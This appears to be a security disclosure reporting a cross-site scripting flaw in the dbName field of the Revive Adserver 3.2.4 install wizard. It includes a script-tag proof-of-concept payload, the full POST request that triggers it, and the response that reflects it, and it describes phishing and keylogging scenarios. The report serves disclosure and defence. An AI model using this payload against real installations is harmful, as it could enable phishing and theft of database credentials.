“Cricetinae” :)
The dbName parameter in Step 2 of Installation Wizard is vulnerable to Cross-Site Scripting vulnerability when the form is returned with error.
Cross-Site Scripting issue let’s one to run a javascript of choice. It helps most of the client side risks including but not limited to phishing, temporary deface, browser key-logger and others. Exploitation frameworks like BeEF eases the offensive attack.
Though this may be treated as a Self-XSS, the place where the issue is affecting is sensitive. If the user who is going to set up the Revive Adserver, follows an untrusted malicious guide which contains specially crafted XSS payload, can help in gaining access to the database by tricking him to enter the credential in attacker’s site by redirecting or any other way.
something<script>alert('xss');</script>
for Database Name fieldPOST /revive-adserver/www/admin/install.php HTTP/1.1 .. .. Connection: close
_qf__install-db-form=&action=database&moreFieldsShown=&dbName=something<script>alert('xss');</script>&dbUser=root&dbPassword=roots&dbHost=localhost&dbType=mysql&dbLocal=0&dbPort=3306&dbTableType=MYISAM&dbTablePrefix=rv_&save=Continue+%C2%BB
`
###HTTP Response
HTTP/1.1 200 OK
…
<span> Database names cannot contain "/", "\", ".", or characters that are not allowed in filenames <br /> Installation failed to create the database something<script>alert('xss');</script></span>
###Test Environment Details
Version: Latest as on Sept 17: revive-adserver-3.2.4 downloaded from official websiteSetup type: localBrowser: Firefox 47.0OS: Mac OS X
Cheers,
Pavan